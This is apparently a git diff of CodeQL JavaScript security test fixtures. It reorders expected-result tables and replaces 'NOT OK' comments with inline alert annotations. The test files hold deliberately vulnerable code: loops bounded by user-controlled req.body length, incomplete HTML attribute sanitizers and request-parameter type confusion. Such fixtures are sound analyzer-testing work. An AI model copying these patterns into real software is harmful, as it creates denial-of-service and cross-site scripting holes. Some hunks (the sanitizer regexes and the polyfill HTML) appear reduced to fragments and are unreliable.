@@ -1,3 +1,21 @@ +#select +| tst.js:243:9:243:31 | s().rep ... ]/g,'') | tst.js:243:9:243:31 | s().rep ... ]/g,'') | tst.js:243:9:243:31 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:243:9:243:31 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:244:9:244:33 | s().rep ... /g, '') | tst.js:244:9:244:33 | s().rep ... /g, '') | tst.js:244:9:244:33 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:244:9:244:33 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:249:9:249:33 | s().rep ... ]/g,'') | tst.js:249:9:249:33 | s().rep ... ]/g,'') | tst.js:249:9:249:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:249:9:249:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:250:9:250:33 | s().rep ... ]/g,'') | tst.js:250:9:250:33 | s().rep ... ]/g,'') | tst.js:250:9:250:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:250:9:250:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:253:21:253:45 | s().rep ... /g, '') | tst.js:253:21:253:45 | s().rep ... /g, '') | tst.js:253:21:253:45 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:253:21:253:45 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:254:32:254:56 | s().rep ... /g, '') | tst.js:254:32:254:56 | s().rep ... /g, '') | tst.js:254:32:254:56 | s().rep ... 
/g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:254:32:254:56 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:270:61:270:85 | s().rep ... /g, '') | tst.js:270:61:270:85 | s().rep ... /g, '') | tst.js:270:61:270:85 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:270:61:270:85 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:275:9:275:21 | arr.join(" ") | tst.js:274:12:274:94 | s().val ... g , '') | tst.js:275:9:275:21 | arr.join(" ") | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:274:12:274:94 | s().val ... g , '') | this final HTML sanitizer step | +| tst.js:300:10:300:33 | s().rep ... ]/g,'') | tst.js:300:10:300:33 | s().rep ... ]/g,'') | tst.js:300:10:300:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:300:10:300:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:301:10:301:32 | s().rep ... ]/g,'') | tst.js:301:10:301:32 | s().rep ... ]/g,'') | tst.js:301:10:301:32 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:301:10:301:32 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:302:10:302:34 | s().rep ... ]/g,'') | tst.js:302:10:302:34 | s().rep ... ]/g,'') | tst.js:302:10:302:34 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:302:10:302:34 | s().rep ... ]/g,'') | this final HTML sanitizer step | +| tst.js:303:10:303:34 | s().rep ... 
/g, '') | tst.js:303:10:303:34 | s().rep ... /g, '') | tst.js:303:10:303:34 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:303:10:303:34 | s().rep ... /g, '') | this final HTML sanitizer step | +| tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | this final HTML sanitizer step | +edges +| tst.js:274:6:274:94 | arr | tst.js:275:9:275:11 | arr | provenance | | +| tst.js:274:12:274:94 | s().val ... g , '') | tst.js:274:6:274:94 | arr | provenance | | +| tst.js:275:9:275:11 | arr | tst.js:275:9:275:21 | arr.join(" ") | provenance | | nodes | tst.js:243:9:243:31 | s().rep ... ]/g,'') | semmle.label | s().rep ... ]/g,'') | | tst.js:244:9:244:33 | s().rep ... /g, '') | semmle.label | s().rep ... /g, '') | 
@@ -15,22 +33,4 @@ nodes | tst.js:302:10:302:34 | s().rep ... ]/g,'') | semmle.label | s().rep ... ]/g,'') | | tst.js:303:10:303:34 | s().rep ... /g, '') | semmle.label | s().rep ... /g, '') | | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | semmle.label | s().rep ... ;";\\n\\t}) | -edges -| tst.js:274:6:274:94 | arr | tst.js:275:9:275:11 | arr | provenance | | -| tst.js:274:12:274:94 | s().val ... g , '') | tst.js:274:6:274:94 | arr | provenance | | -| tst.js:275:9:275:11 | arr | tst.js:275:9:275:21 | arr.join(" ") | provenance | | subpaths -#select -| tst.js:243:9:243:31 | s().rep ... ]/g,'') | tst.js:243:9:243:31 | s().rep ... ]/g,'') | tst.js:243:9:243:31 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:243:9:243:31 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:244:9:244:33 | s().rep ... /g, '') | tst.js:244:9:244:33 | s().rep ... /g, '') | tst.js:244:9:244:33 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:244:9:244:33 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:249:9:249:33 | s().rep ... ]/g,'') | tst.js:249:9:249:33 | s().rep ... ]/g,'') | tst.js:249:9:249:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:249:9:249:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:250:9:250:33 | s().rep ... ]/g,'') | tst.js:250:9:250:33 | s().rep ... ]/g,'') | tst.js:250:9:250:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:250:9:250:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:253:21:253:45 | s().rep ... /g, '') | tst.js:253:21:253:45 | s().rep ... 
/g, '') | tst.js:253:21:253:45 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:253:21:253:45 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:254:32:254:56 | s().rep ... /g, '') | tst.js:254:32:254:56 | s().rep ... /g, '') | tst.js:254:32:254:56 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:254:32:254:56 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:270:61:270:85 | s().rep ... /g, '') | tst.js:270:61:270:85 | s().rep ... /g, '') | tst.js:270:61:270:85 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain ampersands or double quotes when it reaches this attribute definition. | tst.js:270:61:270:85 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:275:9:275:21 | arr.join(" ") | tst.js:274:12:274:94 | s().val ... g , '') | tst.js:275:9:275:21 | arr.join(" ") | Cross-site scripting vulnerability as the output of $@ may contain double quotes when it reaches this attribute definition. | tst.js:274:12:274:94 | s().val ... g , '') | this final HTML sanitizer step | -| tst.js:300:10:300:33 | s().rep ... ]/g,'') | tst.js:300:10:300:33 | s().rep ... ]/g,'') | tst.js:300:10:300:33 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:300:10:300:33 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:301:10:301:32 | s().rep ... ]/g,'') | tst.js:301:10:301:32 | s().rep ... ]/g,'') | tst.js:301:10:301:32 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:301:10:301:32 | s().rep ... 
]/g,'') | this final HTML sanitizer step | -| tst.js:302:10:302:34 | s().rep ... ]/g,'') | tst.js:302:10:302:34 | s().rep ... ]/g,'') | tst.js:302:10:302:34 | s().rep ... ]/g,'') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:302:10:302:34 | s().rep ... ]/g,'') | this final HTML sanitizer step | -| tst.js:303:10:303:34 | s().rep ... /g, '') | tst.js:303:10:303:34 | s().rep ... /g, '') | tst.js:303:10:303:34 | s().rep ... /g, '') | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:303:10:303:34 | s().rep ... /g, '') | this final HTML sanitizer step | -| tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | Cross-site scripting vulnerability as the output of $@ may contain single quotes when it reaches this attribute definition. | tst.js:309:10:318:3 | s().rep ... ;";\\n\\t}) | this final HTML sanitizer step | diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.qlref b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.qlref index d6963163eef5..d8af0686b84a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.qlref @@ -1 +1,2 @@ -Security/CWE-116/IncompleteHtmlAttributeSanitization.ql \ No newline at end of file +query: Security/CWE-116/IncompleteHtmlAttributeSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected index 96a48fec6cb8..22b3868a62a8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected @@ -18,25 +18,25 @@ | tst-multi-character-sanitization.js:83:7:83:63 | x.repla ... gi, "") | This string may still contain $@, which may cause an HTML element injection vulnerability. | tst-multi-character-sanitization.js:83:18:83:21 | /gm, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/g, ""); // NOT OK (ng-attributes) + x = x.replace(//gm, ""); // $ Alert[js/incomplete-multi-character-sanitization] + x = x.replace(/\sng-[a-z-]+/, ""); // $ Alert[js/incomplete-multi-character-sanitization] + x = x.replace(/\sng-[a-z-]+/g, ""); // $ Alert[js/incomplete-multi-character-sanitization] - ng-attributes - x = x.replace(/()/g, "\n"); // OK: not a sanitizer + x = x.replace(/()/g, "\n"); // OK - not a sanitizer - x = x.replace(//g, ""); // OK [INCONSISTENCY] - x = x.replace(/> - > - > - - + > + > + > + + - - - + + + - + - - + \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html index 6b9fbfe65c8a..97ed8b016f00 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html +++ b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html @@ -1,7 +1,7 @@ Polyfill.io demo - + ... 
diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.expected b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.expected index 511e776ed3c8..6aedcc6c4c56 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.expected 
@@ -1,3 +1,13 @@ +#select +| LoopBoundInjectionBad.js:20:25:20:27 | val | LoopBoundInjectionBad.js:8:13:8:20 | req.body | LoopBoundInjectionBad.js:20:25:20:27 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:8:13:8:20 | req.body | user-provided value | +| LoopBoundInjectionBad.js:29:16:29:18 | val | LoopBoundInjectionBad.js:10:15:10:22 | req.body | LoopBoundInjectionBad.js:29:16:29:18 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:10:15:10:22 | req.body | user-provided value | +| LoopBoundInjectionBad.js:38:15:38:17 | val | LoopBoundInjectionBad.js:12:25:12:32 | req.body | LoopBoundInjectionBad.js:38:15:38:17 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:12:25:12:32 | req.body | user-provided value | +| LoopBoundInjectionBad.js:51:25:51:27 | val | LoopBoundInjectionBad.js:14:19:14:26 | req.body | LoopBoundInjectionBad.js:51:25:51:27 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:14:19:14:26 | req.body | user-provided value | +| LoopBoundInjectionExitBad.js:20:22:20:24 | val | LoopBoundInjectionExitBad.js:8:9:8:16 | req.body | LoopBoundInjectionExitBad.js:20:22:20:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:8:9:8:16 | req.body | user-provided value | +| LoopBoundInjectionExitBad.js:34:22:34:24 | val | LoopBoundInjectionExitBad.js:10:9:10:16 | req.body | LoopBoundInjectionExitBad.js:34:22:34:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. 
| LoopBoundInjectionExitBad.js:10:9:10:16 | req.body | user-provided value | +| LoopBoundInjectionExitBad.js:49:22:49:24 | val | LoopBoundInjectionExitBad.js:12:10:12:17 | req.body | LoopBoundInjectionExitBad.js:49:22:49:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:12:10:12:17 | req.body | user-provided value | +| LoopBoundInjectionExitBad.js:60:8:60:10 | val | LoopBoundInjectionExitBad.js:14:14:14:21 | req.body | LoopBoundInjectionExitBad.js:60:8:60:10 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:14:14:14:21 | req.body | user-provided value | +| LoopBoundInjectionLodash.js:13:13:13:15 | val | LoopBoundInjectionLodash.js:9:13:9:20 | req.body | LoopBoundInjectionLodash.js:13:13:13:15 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionLodash.js:9:13:9:20 | req.body | user-provided value | edges | LoopBoundInjectionBad.js:8:13:8:20 | req.body | LoopBoundInjectionBad.js:17:18:17:20 | val | provenance | | | LoopBoundInjectionBad.js:10:15:10:22 | req.body | LoopBoundInjectionBad.js:25:20:25:22 | val | provenance | | 
@@ -46,13 +56,3 @@ nodes | LoopBoundInjectionLodash.js:12:18:12:20 | val | semmle.label | val | | LoopBoundInjectionLodash.js:13:13:13:15 | val | semmle.label | val | subpaths -#select -| LoopBoundInjectionBad.js:20:25:20:27 | val | LoopBoundInjectionBad.js:8:13:8:20 | req.body | LoopBoundInjectionBad.js:20:25:20:27 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:8:13:8:20 | req.body | user-provided value | -| LoopBoundInjectionBad.js:29:16:29:18 | val | LoopBoundInjectionBad.js:10:15:10:22 | req.body | LoopBoundInjectionBad.js:29:16:29:18 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:10:15:10:22 | req.body | user-provided value | -| LoopBoundInjectionBad.js:38:15:38:17 | val | LoopBoundInjectionBad.js:12:25:12:32 | req.body | LoopBoundInjectionBad.js:38:15:38:17 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:12:25:12:32 | req.body | user-provided value | -| LoopBoundInjectionBad.js:51:25:51:27 | val | LoopBoundInjectionBad.js:14:19:14:26 | req.body | LoopBoundInjectionBad.js:51:25:51:27 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionBad.js:14:19:14:26 | req.body | user-provided value | -| LoopBoundInjectionExitBad.js:20:22:20:24 | val | LoopBoundInjectionExitBad.js:8:9:8:16 | req.body | LoopBoundInjectionExitBad.js:20:22:20:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. 
| LoopBoundInjectionExitBad.js:8:9:8:16 | req.body | user-provided value | -| LoopBoundInjectionExitBad.js:34:22:34:24 | val | LoopBoundInjectionExitBad.js:10:9:10:16 | req.body | LoopBoundInjectionExitBad.js:34:22:34:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:10:9:10:16 | req.body | user-provided value | -| LoopBoundInjectionExitBad.js:49:22:49:24 | val | LoopBoundInjectionExitBad.js:12:10:12:17 | req.body | LoopBoundInjectionExitBad.js:49:22:49:24 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:12:10:12:17 | req.body | user-provided value | -| LoopBoundInjectionExitBad.js:60:8:60:10 | val | LoopBoundInjectionExitBad.js:14:14:14:21 | req.body | LoopBoundInjectionExitBad.js:60:8:60:10 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionExitBad.js:14:14:14:21 | req.body | user-provided value | -| LoopBoundInjectionLodash.js:13:13:13:15 | val | LoopBoundInjectionLodash.js:9:13:9:20 | req.body | LoopBoundInjectionLodash.js:13:13:13:15 | val | Iteration over a user-controlled object with a potentially unbounded .length property from a $@. | LoopBoundInjectionLodash.js:9:13:9:20 | req.body | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.qlref index 8186c4fca6a3..6313b6e4f63d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjection.qlref @@ -1 +1,2 @@ -Security/CWE-834/LoopBoundInjection.ql \ No newline at end of file +query: Security/CWE-834/LoopBoundInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js index bca6567b4f5e..ea92479d9b97 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js @@ -5,19 +5,19 @@ var router = new express.Router(); var rootRoute = router.route('foobar'); rootRoute.post(function(req, res) { - problem(req.body); + problem(req.body); // $ Source - whileLoop(req.body); + whileLoop(req.body); // $ Source - useLengthIndirectly(req.body); + useLengthIndirectly(req.body); // $ Source - noNullPointer(req.body); + noNullPointer(req.body); // $ Source }); function problem(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert ret.push(val[i]); } } @@ -26,7 +26,7 @@ function whileLoop(val) { var ret = []; var i = 0; - while (i < val.length) { // NOT OK! + while (i < val.length) { // $ Alert ret.push(val[i]); i++; } @@ -35,7 +35,7 @@ function whileLoop(val) { function useLengthIndirectly(val) { var ret = []; - var len = val.length; // NOT OK! + var len = val.length; // $ Alert for (var i = 0; i < len; i++) { ret.push(val[i]); @@ -48,7 +48,7 @@ function noNullPointer(val) { const c = 0; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert // Constantly accessing element 0, therefore not guaranteed null-pointer. ret.push(val[c].foo); diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js index 3193a384aca2..3ce829e1f19f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js 
@@ -5,19 +5,19 @@ var rootRoute = router.route('foobar'); var _ = require("lodash"); rootRoute.post(function (req, res) { - breaks(req.body); + breaks(req.body); // $ Source - throws(req.body); + throws(req.body); // $ Source - returns(req.body); + returns(req.body); // $ Source - lodashThrow(req.body); + lodashThrow(req.body); // $ Source }); function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert for (var k = 0; k < 2; k++) { if (k == 3) { // Does not prevent DoS, because this is inside an inner loop. @@ -31,7 +31,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { try { throw 2; // Is caught, and therefore the DoS is not prevented. @@ -46,7 +46,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { (function (i) { return i+2; // Does not prevent DoS. @@ -57,7 +57,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // NOT OK! + _.map(val, function (e) { // $ Alert if (!e) { try { throw new Error(); // Does not prevent DoS. diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js index 705ec6b5b0ea..71586956dad2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { break; // Prevents DoS. } 
@@ -28,7 +28,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { throw 2; // Prevents DoS. } @@ -40,7 +40,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { return 2; // Prevents DoS. } @@ -49,7 +49,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // OK + _.map(val, function (e) { if (!e) { throw new Error(); // Prevents DoS. } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js index 49c813834450..ddd0dcf3301d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js @@ -23,7 +23,7 @@ function sanitized(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -35,7 +35,7 @@ function sanitized2(val) { return []; } // Val can only be a primitive. Therefore no issue! - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -53,7 +53,7 @@ function sanitized3(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } 
@@ -67,7 +67,7 @@ function sanitized4(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js index 2f2fdb0d67a0..6445d3bfbb82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js @@ -6,9 +6,9 @@ var router = new express.Router(); var rootRoute = router.route('foobar'); rootRoute.post(function(req, res) { - problem(req.body); + problem(req.body); // $ Source }); function problem(val) { - _.chunk(val, 2); // NOT OK! + _.chunk(val, 2); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js index 22649392557e..a9817883f082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js @@ -16,7 +16,7 @@ function problem(val) { return []; } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js index b8e4b1f50971..bd3aed633ff5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js 
@@ -21,7 +21,7 @@ rootRoute.post(function(req, res) { function nullPointer(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo + 42); } } @@ -30,7 +30,7 @@ function nullPointer(val) { function nullPointer2(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { var element = val[i]; ret.push(element.foo + 42); } @@ -38,7 +38,7 @@ function nullPointer2(val) { function nullPointer3(val) { let arr = val.messaging - for (let i = 0; i < arr.length; i++) { // OK + for (let i = 0; i < arr.length; i++) { let event = val.messaging[i] let sender = event.sender.id } @@ -46,13 +46,13 @@ function nullPointer3(val) { function lodashPointer(val) { - return _.map(val, function(e) { // OK + return _.map(val, function(e) { return e.foo; }) } function lodashArrowFunc(val) { - return _.map(val, (e) => { // OK + return _.map(val, (e) => { return e.foo; }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js index bbbe3a9eb7ee..ac456fbdbd94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js @@ -14,11 +14,11 @@ function nullPointer(val) { var ret = []; // Has obvious null-pointer. And guards the next loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo); } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } 
diff --git a/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.expected b/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.expected
index 27de08dc8461..b07e1c194a45 100644
--- a/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.expected
@@ -1,3 +1,18 @@ +#select +| tst.js:6:5:6:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:6:5:6:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:8:5:8:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:8:5:8:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:11:9:11:11 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:11:9:11:11 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:15:9:15:11 | bar | tst.js:5:15:5:27 | req.query.foo | tst.js:15:9:15:11 | bar | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:27:5:27:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:27:5:27:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:28:5:28:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:28:5:28:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:30:5:30:7 | foo | tst.js:5:15:5:27 | req.query.foo | 